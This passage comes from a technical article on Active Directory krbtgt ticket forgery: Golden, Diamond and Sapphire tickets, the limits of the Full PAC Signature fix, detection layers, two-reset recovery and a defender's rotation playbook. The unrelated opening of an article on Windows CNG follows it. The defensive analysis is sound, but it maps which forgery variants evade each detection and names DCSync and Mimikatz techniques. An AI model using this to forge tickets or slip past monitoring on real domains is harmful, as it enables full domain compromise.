Microsoft's formal response to the post-2014 attack arc shipped as KB5020805 starting November 8, 2022, addressing CVE-2022-37967 [@kb5020805][@cve-2022-37967]. The fix adds a new PAC signature -- the Full PAC Signature -- computed by the KDC over the entire PAC including the older two signatures, validated on incoming tickets, and rolled out across five deployment phases:

Phase	Date	Mode	`KrbtgtFullPacSignature` value
Initial Deployment	November 8, 2022	Signatures added, validation disabled	1 (Compatibility)
Second Deployment	December 13, 2022	Audit mode default	2 (Audit)
Third Deployment	June 13, 2023	Cannot disable signature addition	(value 0 removed)
Default Enforcement	July 11, 2023	Enforcement default	3 (Enforcement)
Removal of Compatibility	October 10, 2023	Audit removed, Enforcement permanent	(registry key removed)

KB5020805 documents the final state verbatim: "Windows updates released on or after October 10, 2023 will do the following: Removes support for the registry subkey KrbtgtFullPacSignature. Removes support for Audit mode. All service tickets without the new PAC signatures will be denied authentication" [@kb5020805].

Note: The KB number for KrbtgtFullPacSignature is KB5020805, not KB5021131. KB5021131 is the paired but distinct KB for CVE-2022-37966 (encryption-type enforcement). The PAC-signature-specific KB is KB5020805. Secondary sources routinely confuse the two.

Here is the structural fact. The Full PAC Signature is also computed under the krbtgt key. So an attacker who holds the krbtgt key still mints fully-validating tickets, including:

Sapphire Tickets, which never modify the PAC at all; the existing signatures the KDC issued are valid by construction, the Full PAC Signature included.
Recomputed Diamond Tickets, in which the attacker simply computes the Full PAC Signature alongside the older KDC signature in the same step, because both depend on the same key the attacker holds.

KrbtgtFullPacSignature retired one specific class of attack (Diamond Tickets that did not recompute the Full PAC Signature). It did not retire the underlying primitive (TGT forgery from a known krbtgt key). The PAC signature surface in Section 3 -- all three signatures terminating at the same key -- is exactly why this is so.

Key idea: The Full PAC Signature was Microsoft's structural response to Diamond Ticket. It is itself computed under the krbtgt key. So an attacker who holds the krbtgt key recomputes it in the same step as the KDC signature -- and Sapphire Tickets, which never modify the PAC at all, are unaffected by construction. CVE-2022-37967 retired one class of attack (PAC-modifying Diamond variants); it did not retire the primitive.

Comparing the three forgery variants

Dimension	Golden	Diamond	Sapphire
Requires krbtgt key?	Yes	Yes (AES-256)	Yes (AES-256)
Calls the KDC?	No (forges from scratch)	Yes (real AS-REQ)	Yes (AS-REQ + S4U2self+U2U)
Modifies the PAC?	Builds it from scratch	Yes (group SIDs)	No (genuine PAC)
Defeats MDI encryption downgrade alert?	No (defaults RC4)	Yes (real AES)	Yes (real AES)
Defeats MDI time-anomaly alert?	No (defaults 10y)	Yes (KDC lifetime)	Yes (KDC lifetime)
Defeats MDI forged-auth-data alert?	No	Yes (still triggers if group mismatch detected via other means)	Yes (PAC is genuine)
Defeats Full PAC Signature (post-July 2023)?	Yes (recomputed under held key)	Yes (recomputed)	Yes (genuine PAC)
Known wire-residual?	Encryption type, lifetime, groups	Re-encryption-under-held-key timing	S4U2self+U2U conjunction

Six generations from MS14-068 to KrbtgtFullPacSignature, and the residual primitive is exactly what the 1988 paper described: hold the key, mint the ticket. So what does the detection topology in 2026 actually catch?

6. The Detection Stack in 2026

Detection of krbtgt-class attacks in 2026 is a four-layer stack. Each layer has a specific class of signal it reads, a specific class of attack it catches, and a specific gap that the next layer is supposed to close. Three of the four layers have a known gap above them. The fourth has nothing above it.

flowchart TD L4["Layer 4 -- S4U2self plus U2U residual (no vendor analytic shipped)"] L3["Layer 3 -- Network/SIEM (Sentinel, Splunk T1558.001)"] L2["Layer 2 -- Behavioural (MDI Suspected-Golden-Ticket family)"] L1["Layer 1 -- Posture (BloodHound DCSync edge)"] KEY["krbtgt long-term key (the attacker's objective)"] L1 --> L2 L2 --> L3 L3 --> L4 L4 --> KEY

Layer 1: posture (BloodHound DCSync edge)

The posture layer asks a question with no per-event component: "Who has rights that could extract the krbtgt key, regardless of whether they have used those rights?" In Active Directory terms, the answer is "anyone holding DS-Replication-Get-Changes plus DS-Replication-Get-Changes-All rights against a writeable DC, plus anyone who holds privileges that allow them to grant those rights to themselves." BloodHound encodes the answer as a DCSync edge in its graph; the canonical community Cypher query is MATCH (u)-[:DCSync]->(d:Domain) RETURN u, d. The current shipping release of BloodHound Community Edition is v9.1.0, dated 2026-05-06 per the release notes [@bloodhound-notes].

A replication primitive Mimikatz first productionised in August 2015. The attacker invokes the `DRSGetNCChanges` API call against a writeable domain controller, masquerading as a peer DC, and the target DC obligingly streams back the requested account secrets including the krbtgt long-term key. MITRE T1003.006 catalogues the technique [@mitre-t1003006]. Sean Metcalf's adsecurity.org write-up notes "DCSync was written by Benjamin Delpy and Vincent Le Toux" [@adsec-1729].

What this layer detects: any principal whose existing AD permissions create a path to the krbtgt key. What this layer misses: any attacker who already has the key. Posture is preventive, not detective. By the time the attacker is invoking kerberos::golden, the posture layer has already missed its window.

Layer 2: behavioural (Microsoft Defender for Identity)

Microsoft Defender for Identity ships an alert family covering classic Golden-Ticket-from-Mimikatz behaviour. The live MDI classic alerts page enumerates six Suspected-Golden-Ticket External IDs: 2009 (encryption downgrade), 2013 (forged authorization data), 2022 (time anomaly), 2027 (nonexistent account), 2032 (ticket anomaly), and 2040 (ticket anomaly using RBCD) [@mdi-classic]. The Credential access section adds External ID 2006 for "Suspected DCSync attack" on the extraction side [@mdi-classic].

What this layer detects: the Mimikatz Golden Ticket defaults plus the DCSync extraction primitive that produces the krbtgt key in the first place. What this layer misses: Diamond and Sapphire by construction. Diamond removes the PAC-content anomalies because every artefact except the modified group SIDs comes from the real KDC. Sapphire defeats PAC-content anomaly detection entirely by using a PAC the KDC genuinely issued via S4U2self plus U2U.

The MDI credential-access alerts page is the entry point to the family in the modern Microsoft Defender XDR console layout [@mdi-credential].

Layer 3: network and SIEM (Sentinel, Splunk)

Multi-vendor SIEM content packs ship analytic rules covering Kerberos behaviours flagged under MITRE T1558.001. Splunk's research catalogue contains the canonical example: "Kerberos Service Ticket Request Using RC4 Encryption" detects TGS-REQ traffic with encryption-type 0x17 (RC4-HMAC), leveraging Windows Event 4769 from the DCs [@splunk-7d9]. Microsoft Sentinel ships parallel rules under the Microsoft Defender XDR content connector. The pattern these analytics share is reliance on encryption-type anomalies, group-membership anomalies, or lifetime anomalies that appear in Windows event logs after the fact.

What this layer detects: signature-style indicators of Golden Ticket behaviour on the wire and in the DC event log. What this layer misses: the same encryption-downgrade dependency MDI's alert 2009 has. The Splunk analytic verbatim acknowledges its own limit: "This detection may be bypassed if attackers use the AES key instead of the NTLM hash" [@splunk-7d9]. Diamond and Sapphire both use the AES-256 key. Both walk through this layer untouched.

Note: Microsoft Sentinel ships rules called "Kerberoasting" that target MITRE T1558.003 (extracting service-account secrets by requesting SPN-bearing service tickets and brute-forcing the resulting RC4-encrypted blobs offline). Those rules target service accounts with SPNs registered against them. They are not a krbtgt detection asset. The krbtgt account does not have an SPN that any client can request a TGS for; the relevant Sentinel content for krbtgt-class attacks is the T1558.001 Golden-Ticket and Kerberos-anomaly analytic family.

Layer 4: the Sapphire residual

What would catch a Sapphire Ticket? The only wire-observable residual of the technique is the conjunction of (a) a TGS-REQ specifying the S4U2self flag, and (b) the same TGT being used to address a User-to-User request to the KDC. No other layer of the stack reads this signal because no other attack has historically produced it as a precondition.

What ships: nothing canonical. SpecterOps and the BloodHound content team have signalled graph-query work on the U2U TGS issuance pattern in 2026 trend reports [@bloodhound-notes], but no shipped default-enabled analytic. Palo Alto Unit 42's "Precious Gemstones" survey describes Cortex XDR detection-attempt heuristics but does not publish the rule [@unit42-gemstones]. The gap is engineering, not theoretical: the signal exists, the analytic to read it has simply not been packaged.

Note: No vendor analytic shipped for the S4U2self plus U2U conjunction as of May 2026. Sapphire is the current frontier and the article's "what 2026 still cannot do" gap. An attacker who holds the krbtgt key and uses the Sapphire technique walks past every shipping detection layer.

SpecterOps and the BloodHound content team have signalled graph-query work on the U2U TGS issuance pattern; Palo Alto Unit 42's "Precious Gemstones" survey describes Cortex XDR detection-attempt heuristics [@unit42-gemstones]. Neither has shipped a clean canonical default-enabled analytic. The gap is engineering, not theoretical, and it is the active research front for the 2026 to 2028 cycle.

Defensive method matrix

Method	Catches Golden?	Catches Diamond?	Catches Sapphire?	Layer
BloodHound DCSync edge	preventive only	preventive only	preventive only	1
MDI Suspected-Golden-Ticket (4 alerts)	yes	no	no	2
MDI Suspected DCSync (ID 2006)	extraction step only	extraction step only	extraction step only	2
Sentinel / Splunk T1558.001 RC4 rule	yes (if RC4)	no	no	3
Sentinel Kerberos-anomaly content pack	partial (lifetime/groups)	no	no	3
Full PAC Signature (post-July 2023)	n/a (already signed correctly)	retires non-recomputing variants	no	n/a (cryptographic enforcement, not detection)
S4U2self+U2U conjunction analytic	n/a	n/a	would catch	4 (not shipped)

Adjacent T1558 family techniques that are not krbtgt detections

Technique	What it targets	krbtgt detection?
T1558.002 Silver Ticket	service-account long-term keys	no
T1558.003 Kerberoasting	SPN-bearing service accounts via offline RC4 crack	no
T1558.004 AS-REP Roasting	accounts with pre-auth disabled	no
OverPass-the-Hash	user NTLM hashes via Kerberos PA-DATA	no

Detection in 2026 is a four-layer stack, and three of the layers leave gaps the next layer is supposed to close. The fourth gap -- the Sapphire residual -- has no layer above it. When the gaps close enough to confirm a krbtgt compromise, what does recovery actually look like?

7. Recovery: What the Two-Reset Procedure Actually Does

The Microsoft AD Forest Recovery page states the procedure verbatim:

"You should perform this operation twice. You must wait 10 hours between password resets. 10 hours are the default Maximum lifetime for user ticket and Maximum lifetime for service ticket policy settings, hence in a case where the Maximum lifetime period changes, the minimum waiting period between resets should be greater than the configured value." -- and -- "The password history value for the krbtgt account is 2, meaning it includes the two most recent passwords. By resetting the password twice you effectively clear any old passwords from the history, so there's no way another DC replicates with this DC by using an old password." [@ms-forest-recovery]

What exactly do those two resets buy, and what do they not buy?

The mechanics of two-slot eviction

The krbtgt account, like every other AD account, stores both current and previous keys. A TGT issued at time $T = 0$ under key $K_0$ continues to validate after a rotation at $T = T_1$ (when $K_1$ becomes current and $K_0$ moves to the previous slot), because the KDC tries both keys during the in-flight validation window. One rotation fills the previous slot with the now-replaced $K_0$; the second rotation, separated by at least MaxTicketAge so that all $K_0$-signed TGTs have expired naturally, fills the previous slot with $K_1$ and evicts $K_0$ entirely. After the second rotation completes and replicates, no key in the krbtgt account matches the attacker's extracted $K_0$; forged TGTs from that key fail validation cleanly [@ms-forest-recovery].

The Kerberos policy value that bounds the lifetime of a Ticket-Granting Ticket from the moment of issuance. The Active Directory default is 10 hours, configured via the Default Domain Policy. The AD Forest Recovery procedure waits at least `MaxTicketAge` between krbtgt resets to ensure no in-flight TGT outlives the period between the two rotations [@ms-forest-recovery]. flowchart LR A0["T=0: K_0 current, K_prior previous"] --> A1["T=T_1: reset 1 -- K_1 current, K_0 previous"] A1 --> A2["T_1 + 10h: K_1 still current, K_0 still previous"] A2 --> A3["T=T_2 (≥ T_1 + 10h): reset 2 -- K_2 current, K_1 previous"] A3 --> A4["After replication: K_0 evicted from both slots"]

The 10-hour wait between resets is not a Microsoft convenience choice; it is a cryptographic requirement. If the second reset lands before all $K_0$-signed TGTs have expired naturally, some of those tickets will hit a DC whose previous slot now holds $K_1$ rather than $K_0$, and the KDC will reject them. This is what KB5020805's PAC-signature deployment phases also had to navigate during the November 2022 to October 2023 rollout: signature additions and validation transitions had to bracket the maximum in-flight ticket lifetime [@kb5020805].

{` // Model the krbtgt account as a two-slot store; simulate the two-reset procedure. function simulate(events) { const slots = { current: "K_prior", previous: null }; let stolen = null; for (const ev of events) { if (ev.kind === "compromise") { stolen = slots.current; } else if (ev.kind === "reset") { slots.previous = slots.current; slots.current = ev.newKey; } const validates = stolen && (stolen === slots.current || stolen === slots.previous); console.log( "[t=" + ev.t.toString().padStart(3) + "h]", ev.kind.padEnd(11), "current=" + slots.current, "prev=" + (slots.previous ?? "-"), "attacker_validates=" + validates ); } }

simulate([ { t: 0, kind: "issue" }, { t: 1, kind: "compromise" }, // attacker stores K_prior as stolen { t: 3, kind: "reset", newKey: "K_1" }, { t: 13, kind: "reset", newKey: "K_2" }, // ≥ MaxTicketAge later { t: 14, kind: "issue" }, ]); `}

`New-KrbtgtKeys.ps1`

Microsoft's reference automation for the procedure is New-KrbtgtKeys.ps1, originally distributed as an MSDN Gallery script and currently hosted in the microsoftarchive GitHub organisation. The repository banner reads, verbatim: "This repository was archived by the owner on Mar 8, 2024. It is now read-only" [@new-krbtgt-keys]. The script remains the canonical reference for the rotation procedure, including pre-reset and post-reset replication-health checks; it is simply no longer actively maintained. Operators in 2026 commonly fork it locally or wrap the same Set-ADAccountPassword plus replication-status pattern in their own runbooks.

What two-reset does

Cryptographically invalidates previously-forged TGTs after the second reset replicates fully across all writeable DCs. This is unambiguous and well-documented; the Microsoft Learn page is the primary [@ms-forest-recovery]. After step 3 (the second reset) has replicated, no TGT signed under the pre-compromise key validates anywhere in the domain.

What two-reset does not do

Any attacker who held the krbtgt key has typically already installed parallel persistence. SpecterOps's "Domain of Thrones Part II" by Nico Shyne and Josh Prager, published November 6, 2023, names the rotation list verbatim: "Machine accounts ... User accounts ... Service accounts -- Per domain KRBTGT account ... Trust keys and objects related to trust of all other domains; Group-managed service accounts; Key distribution service root keys" [@specterops-dot2]. The same playbook enumerates the persistence vectors an attacker with krbtgt access typically establishes: AdminSDHolder ACL edits, AD CS template alternates spanning the ESC1 through ESC8 abuse classes (canonically catalogued in Schroeder and Christensen's "Certified Pre-Owned," SpecterOps, June 2021) [@certified-pre-owned], SID History entries, machine-account secret retention, KDS root key exfiltration, trust-key compromise, and DSRM password exfiltration. Two-reset rotates the krbtgt key only; the rest of the trust-root set is untouched [@specterops-dot1][@specterops-dot2].

Key idea: Two-reset rotation cryptographically invalidates previously-forged TGTs. It does NOT rotate any of the other secrets an attacker who held the krbtgt key has typically already installed: AdminSDHolder edits, ADCS templates, SID History, machine-account secrets, KDS root keys, trust keys, DSRM passwords. This is why confirmed krbtgt compromise is a forest-rebuild event, not a key-rotation event.

Two-reset rotation is the cryptographic finish; the operational finish spans the rest of the Domain-of-Thrones surface, and the rotation alone cannot reach it. The single-sentence punchline of the article lands at the end of §11.

Why does Microsoft's AD Forest Recovery page treat krbtgt rotation as a recoverable rotation event while Mandiant-style and SpecterOps-style playbooks treat confirmed krbtgt compromise as a forest-rebuild event? Both statements are true at once. Microsoft documents the *cryptographic* recovery, which terminates at the krbtgt key. The IR playbooks document the *operational* recovery, which spans seven additional secret classes whose compromise the krbtgt holder typically also achieved. The cryptographic recovery is necessary and well-bounded; the operational recovery is necessary and not bounded by the same key.

Recovery has two pieces: a fast cryptographic part (two resets, well-documented) and a slow operational part (seven other secret classes, days to weeks). Both are necessary. Neither is sufficient. Even the combined procedure leaves three structural residuals, which the next section names.

8. Theoretical Limits and Open Problems

Even with the full Domain-of-Thrones rotation surface executed correctly, three structural residuals remain. Each has a current best-partial-result; none has a closed solution.

(a) The pre-second-reset TGT-lifetime window

Any TGT minted from the compromised krbtgt key between the moment of compromise and the moment the second reset replicates remains valid until naturally expired or until step 3 lands. Mimikatz's default 10-year lifetime makes this a years-long window if the attacker pre-minted tickets and a careless DC missed the time-anomaly signal. The MDI Suspected-Golden-Ticket family includes a time-anomaly alert (the External ID 2022 sibling) [@mdi-classic] that reads the difference between plausible and implausible ticket lifetimes. The window is bounded above by the AD MaxTicketAge floor: at minimum, the procedure must take 10 hours of wall-clock per Microsoft's own guidance [@ms-forest-recovery]. Below that floor the cryptographic invalidation does not finish.

The mitigation is procedural: between detection and the start of the rotation, the IR team treats every TGT in the domain as suspect. In practice that means rejecting cached tickets at high-value services, forcing a TGT renewal cycle, and watching the time-anomaly alert closely. The mitigation is not perfect; an attacker who minted tickets with realistic 10-hour lifetimes inside the typical AD policy survives this residual entirely.

(b) AD CS alternate persistence (the ESC class)

An attacker who held the krbtgt key long enough to also touch AD Certificate Services has often installed an ESC-class alternate-identity persistence: a backdoored certificate template allowing Domain Admin certificate issuance (ESC1), a misconfigured EnrolleeSuppliesSubject template (ESC4), an HTTP-bound CA endpoint vulnerable to NTLM relay (ESC8). The ESC class taxonomy is catalogued in Schroeder and Christensen's "Certified Pre-Owned" white paper (SpecterOps, June 2021) [@certified-pre-owned]. The compromised template or endpoint survives krbtgt rotation entirely. The CA private key is its own trust root, parallel to (not subordinate to) the krbtgt key. Domain-of-Thrones Part II names ADCS as a separate rotation workstream that must be addressed alongside the krbtgt reset [@specterops-dot2].

The structural fact: a domain with AD CS deployed has at least two cryptographic trust roots (krbtgt long-term key + CA private key) whose compromises are both recoverable only through different mechanisms. PKINIT, the Kerberos pre-authentication extension that validates certificate-bearing AS-REQs, accepts identities the CA chain attests to. Compromise of the CA chain yields valid Kerberos authentication as any principal, by a different mechanism than holding the krbtgt key, with the same end result.

(c) Cross-domain trust-key compromise

Within a multi-domain forest, the krbtgt of each domain is trusted by the others through inter-domain trust keys. A krbtgt compromise in a child domain can become a forest-level event if the trust topology is not hardened: SID Filtering misconfigurations, missing Selective Authentication on outbound trusts, or stale forest-trust artefacts from earlier domain migrations all extend the blast radius beyond the directly-compromised domain. Microsoft's "Recover from systemic identity compromise" guidance and the AD Forest Recovery procedure index together cover the cross-domain rotation requirements; Domain-of-Thrones Part II's "Trust keys and objects related to trust of all other domains" entry is the concise operational statement [@specterops-dot2].

The mitigation is architectural: domain-isolation discipline at the design phase plus Selective Authentication on all inbound trusts. After the fact, every domain whose krbtgt the compromised domain trusted (directly or transitively) becomes part of the rotation surface.

(d) The HSM-bound krbtgt aspiration

A theoretically clean solution exists in the literature: split the krbtgt key material such that no single party -- including the DC's own KDC service -- could read the full key in cleartext. The construction would be a hardware-security-module-bound krbtgt key (the HSM exposes only sign and verify operations on a key it never releases), or a threshold-cryptography scheme (the key is reconstructed across $n$ DCs, $t$ of which must cooperate per ticket-signing operation). Either construction would close the underlying primitive by making the krbtgt key unreadable in cleartext to anyone with code execution on a DC.

Neither construction is supported by any [MS-KILE] revision through 47.0 dated April 27, 2026 [@mskile]. Neither is on any published Microsoft roadmap as of May 2026. The closest analogues that have shipped -- LSAISO/Credential Guard's VBS trustlet for LSASS secrets on workstations and member servers -- explicitly omit the writeable-DC case by design, because a writeable DC must read the krbtgt key to issue tickets.

Even after two-reset and Domain of Thrones, three residuals remain: a window of time, an alternate trust root, and a topology problem. None of them are theoretical -- all three are operational realities documented in 2024-2026 incident-response practice. But they raise a different question: how does the krbtgt key compare to the other secrets in an AD trust-root set?

9. Where KRBTGT Sits in the AD Trust-Root Set

A correction to a framing that appears in many secondary write-ups: the krbtgt long-term key is one of a small set of "AD trust roots," not the only one. The framing matters because the rotation playbook in Section 7 lists seven secret classes for a reason: each is a candidate trust root that survives compromise of any other.

KRBTGT long-term key. Issues TGTs for all principals in the domain. Unique property within the Kerberos trust root: holding it forges TGTs for arbitrary principals, including ones that do not exist in the directory. Rotation: the two-reset, ten-hour-interval procedure on the AD Forest Recovery page [@ms-forest-recovery].

AD CS root CA private key. Issues certificates that PKINIT trusts for Kerberos pre-authentication. Compromise yields Kerberos auth as any principal via PKINIT -- a different mechanism with the same end result. Rotation: CA hierarchy rebuild, significantly more expensive than krbtgt rotation. SpecterOps "Certified Pre-Owned" (Schroeder + Christensen, June 2021) is the canonical primary on the ESC-class abuses of this trust root, cross-referenced in Domain of Thrones Part II [@certified-pre-owned][@specterops-dot2].

KDS root key. Group Managed Service Account passwords are derived deterministically from a KDS root key plus a per-account msDS-ManagedPasswordId. Compromise of the KDS root key reads every gMSA password in the forest. Different blast radius (service accounts only). Rotation: KDS root key rotation followed by gMSA cycling [@specterops-dot2].

Per-domain inter-domain trust keys. Bridge Kerberos trust between domains in a forest or across explicit external trusts. Compromise yields cross-domain TGT minting. Rotation: per-trust password rotation, with SID Filtering and Selective Authentication audits as the standard hardening procedure.

DSRM passwords on writeable DCs. Directory Services Restore Mode is a local-admin equivalent at the DC level; compromise yields a local logon to the DC, which then enables many other paths including direct read of the krbtgt key from ntds.dit. Rotation: per-DC DSRM password rotation [@specterops-dot2].

The precise framing

Within the Kerberos trust root of a single domain, the krbtgt key occupies a unique position: it is the issuer of every TGT, and forging a TGT requires exactly this key. At the forest-AD-trust-graph level, the krbtgt key is one of a handful of high-cost-to-rotate trust roots, not the only one. The framing matters because it explains why Domain of Thrones Part II lists seven rotation workstreams: each is a candidate path to the same end result (arbitrary identity in the forest) through a different cryptographic mechanism.

Five trust roots, one (krbtgt) with a unique forge-arbitrary-TGTs property, all five surfacing in the rotation list. With the trust-root topology mapped, the article's last technical job is the practical playbook: what does the reader actually do tomorrow morning?

10. Practical Guide: The Rotation and Detection Playbook

Four lanes. Each lane is a concrete action a reader can execute starting tomorrow morning.

Note: Lane 1: Preventive hygiene -- rotate krbtgt twice a year on a calendar schedule and audit who can DCSync. Lane 2: Detection deployment -- ship MDI Suspected-Golden-Ticket alerts plus SIEM T1558.001 content. Lane 3: Confirmed-compromise response -- two-reset rotation followed by the Domain-of-Thrones surface. Lane 4: What does NOT work -- four traps to avoid.

Lane 1: preventive hygiene

Rotate the krbtgt password twice a year on a calendar schedule, regardless of any specific incident. Use New-KrbtgtKeys.ps1 (or a fork of it) with pre-reset and post-reset replication-health checks [@new-krbtgt-keys]. Verify Active Directory replication health between the two rotations; if replication is lagging on any DC, the second reset can outpace the first in some replicas and break in-flight tickets.

Move every Tier-0 account into the Protected Users group. Enable Credential Guard on every workstation and member server. Credential Guard does NOT protect the DC itself by design -- DCs must read the krbtgt key unencrypted -- but it kills the worker-station memory-scrape that initially gets an attacker into a position to pivot to the DC.

Audit who can invoke DCSync. The BloodHound query MATCH (u)-[:DCSync]->(d:Domain) returns every principal whose existing AD permissions can extract the krbtgt key without a DC compromise [@bloodhound-notes][@mitre-t1003006]. Every match should map to a justified administrative role; any unexpected match is a finding.

LSAISO is a Virtualisation-Based Security trustlet that isolates long-term secrets from a SYSTEM-privileged kernel on workstations and member servers. On writeable DCs the design omits LSAISO because the KDC service must read the krbtgt key unencrypted to issue tickets. This is precisely the design property a DCSync-capable attacker exploits.

Note: Two krbtgt rotations per year as preventive hygiene -- not a response to a specific incident. Use New-KrbtgtKeys.ps1 with replication-health checks before, between, and after. The 10-hour wait between rotations is mandatory; do not shorten it [@ms-forest-recovery].

Lane 2: detection deployment

Ship the MDI Suspected-Golden-Ticket alert family plus the DCSync alert (External ID 2006) [@mdi-classic][@mdi-credential]. Confirm the Suspected-Golden-Ticket alerts (2009, 2013, 2022, 2027, 2032, 2040) are active for every domain controller MDI is deployed against. Configure Microsoft Sentinel content-pack rules covering T1558.001 Golden Ticket and Kerberos-anomaly patterns (not the T1558.003 Kerberoasting rules, which target service-account SPNs and are not a krbtgt detection asset). Configure Splunk T1558.001 detection [@splunk-7d9] and tune the encryption-type baseline against legacy systems that legitimately negotiate RC4 (or, better, retire those systems).

Ingest BloodHound for posture-graph visibility. Configure regular collections (the default is weekly) so the DCSync edge list stays current as ACLs change. Cross-reference the DCSync edge inventory against the actual administrative role assignments quarterly.

Lane 3: confirmed-compromise response

When MDI or Sentinel surfaces a confirmed krbtgt compromise -- DCSync extraction observed against a writeable DC, or a Suspected-Golden-Ticket alert with concrete supporting evidence -- the response runs in two parallel tracks. The cryptographic track executes the two-reset rotation: reset the krbtgt password (replicate, verify), wait at least 10 hours, reset again (replicate, verify) [@ms-forest-recovery]. The operational track executes the Domain-of-Thrones Part II rotation surface [@specterops-dot2]:

AD CS template review covering the ESC1 through ESC8 abuse classes [@certified-pre-owned]; replace or restrict templates with EnrolleeSuppliesSubject, broad Enroll permissions, or weak EKU restrictions.
SID History audit (Get-ADUser -Filter * -Properties SIDHistory); investigate every account whose SID History contains a Domain Admins or Enterprise Admins SID.
AdminSDHolder ACL audit; reset Protected Group inherited ACLs and verify the SDProp runs cleanly.
Machine-account secret rotation, especially for Tier-0 servers.
KDS root-key rotation followed by gMSA password cycling.
Trust-key rotation for every inbound and outbound trust.
DSRM password rotation on every writeable DC.

After both tracks complete, re-baseline detection: the post-incident DC event-log baseline will differ from the pre-incident baseline, and detection thresholds may need re-tuning to suppress the resulting alerts.

The reference automation runs against the krbtgt SID specifically, not the friendly name, to avoid any ambiguity with a renamed object. Conceptually: `Set-ADAccountPassword -Identity (Get-ADUser -Filter "objectSID -like '*-502'") -Reset -NewPassword (Convert-To-SecureString (New-RandomPassword) -AsPlainText -Force)`. The Microsoft Learn PowerShell reference for the `Set-ADAccountPassword` cmdlet documents the `-Reset` plus `-NewPassword` parameters used here [@ms-set-adaccountpassword]. The `New-KrbtgtKeys.ps1` script wraps this with replication checks and a confirmation prompt [@new-krbtgt-keys]. Production runbooks always include a pre-check that `Get-ADReplicationFailure` returns no failures before any reset is issued.

Lane 4: what does NOT work

Note: Renaming krbtgt. The RID 502 binding is what the KDC derives from, not the sAMAccountName. The KDC service does not care about the friendly name. Disabling krbtgt. The account is already disabled for interactive logon by design [@ms-default-accounts]. Toggling the field is semantically meaningless to the KDC service, which reads the long-term key directly from the directory. Single rotation. Password-history-of-2 means a single rotation only retires the older of the two keys, leaving the attacker-extracted key (which was current at compromise) still in the previous slot [@ms-forest-recovery]. The procedure must run twice. Treating MDI Suspected-Golden-Ticket alerts as sufficient. Those alerts do not cover Diamond and Sapphire by construction. Sapphire defeats every PAC-content anomaly detection because the PAC is genuine. Confirmed-compromise response must assume the worst even when MDI is silent.

Preventive hygiene, detection deployment, confirmed-compromise response, and four traps to avoid. The FAQ that follows addresses what remains.

11. FAQ

No. It retires Diamond Tickets that do not recompute the Full PAC Signature. It does nothing against tickets minted from a known krbtgt key, including Sapphire Tickets (no PAC modification) and recomputed Diamond Tickets (the attacker holds the key and can compute the new signature in the same step as the older KDC signature) [@kb5020805][@mspac]. No. See §10 Lane 4 trap #1: the RID 502 binding is what the KDC derives from, not the `sAMAccountName` [@ms-default-accounts][@ms-sids]. No. See §10 Lane 4 trap #3: password-history-of-2 keeps the previous key valid after a single rotation, so the procedure must run twice with at least `MaxTicketAge` between resets [@ms-forest-recovery][@new-krbtgt-keys]. No. See §10 Aside on why Credential Guard skips the DC: the KDC service on a writeable DC must read the krbtgt key unencrypted to issue tickets, and DCSync is a remote replication API call (DRSGetNCChanges), not a local LSASS memory scrape [@mitre-t1003006][@ms-credential-guard]. Mechanically, in-flight TGT validation requires the previous-key slot to retain validity for at least `MaxTicketAge` after each rotation. Operationally, the recommended cadence is calendar-driven preventive rotation twice a year, with incident-driven rotation as a separate workstream when confirmed compromise is detected [@ms-forest-recovery]. Indirectly. It forces all krbtgt-encrypted tickets to AES, raising the offline-crack bar against a captured ticket and reducing the surface for the Splunk RC4-Kerberos-anomaly detection family [@splunk-7d9]. It does not affect attacks against a captured krbtgt key; both AES-128 and AES-256 derivations are held in the same account and both validate forged TGTs cleanly. Yes. Each Read-Only Domain Controller has its own `krbtgt_` account whose key signs TGTs only for principals that the RODC can authenticate [@adsec-483]. The full-domain krbtgt is the only account whose key signs TGTs accepted by every DC in the domain; compromise of an RODC-specific `krbtgt_` is a contained event whose blast radius is bounded by the RODC's allowed-list policy. No. The IAKerb and Local KDC features shipping in recent Windows builds affect *where* KDCs run (allowing client-to-client Kerberos without a domain-joined intermediary), not the krbtgt-key trust root inside a domain. The post-RC4 enctype work affects *which* enctypes the krbtgt key derives, not the role of the key. As of [MS-KILE] revision 47.0 dated April 27, 2026, the krbtgt long-term key is still the sole trust anchor for every TGT in the domain [@mskile].

One sentence to take away

Krbtgt rotation invalidates forged TGTs; it does not recover the systemic compromise that produced the forged TGTs in the first place.

That is the precise sentence to keep from ten thousand words. The cryptographic question -- "is the ticket valid?" -- terminates at one key. The operational question -- "is the domain still ours?" -- never does. The 1988 design chose to make ticket validation a property of a single shared secret because that choice made the protocol simple and provably correct. The choice remains correct in 2026. What changed is the meaning of the word compromise: in 1988 the threat model was a passive eavesdropper on a campus LAN; in 2026 the threat model is a remote API call that streams the secret across a DRSGetNCChanges exchange. The key did not move. The attacker's reach did.

CNG Architecture: BCrypt, NCrypt, KSPs, and How Windows Picks Its Algorithms

noreply@paragmali.com (Parag Mali) — Sat, 16 May 2026 00:00:00 GMT

Since Windows Vista, every piece of cryptography in Windows -- TLS, BitLocker, Authenticode, Windows Hello, DPAPI -- flows through the **Cryptography API: Next Generation (CNG)**. CNG splits the world into two layers. **BCrypt** does primitives: AES, SHA, HMAC, RNG, key derivation. **NCrypt** routes calls to a **Key Storage Provider (KSP)** that owns the long-lived private keys: software, TPM, smart card, or a third-party HSM. Algorithm selection is governed by a registered provider-priority list, the Schannel cipher-suite order, and a single FIPS-mode toggle that flips Windows into its validated subset. Windows 11 24H2 added the first post-quantum primitives (ML-KEM, ML-DSA) to the same surface, with no API break. This article walks through how that machine works, why Microsoft designed it that way, and where it leaks.

1. From CAPI to CNG: why Microsoft started over

In the late 1990s, Microsoft shipped its first general cryptographic API. The original Cryptographic Service Providers (CAPI) model [@learn-microsoft-com-service-providers] arrived in Windows NT 4.0 Service Pack 4 in 1998 and defined a plug-in unit called a Cryptographic Service Provider, or CSP. A CSP was a monolithic DLL: it owned the algorithm implementations, the key storage, and the export-control posture all at once. If you wanted to add hardware-backed RSA on Windows NT, you wrote a CSP. If you wanted to add a new hash function, you also wrote a CSP. The model worked for the algorithms Microsoft had in mind when it designed it.

Then the algorithms changed.

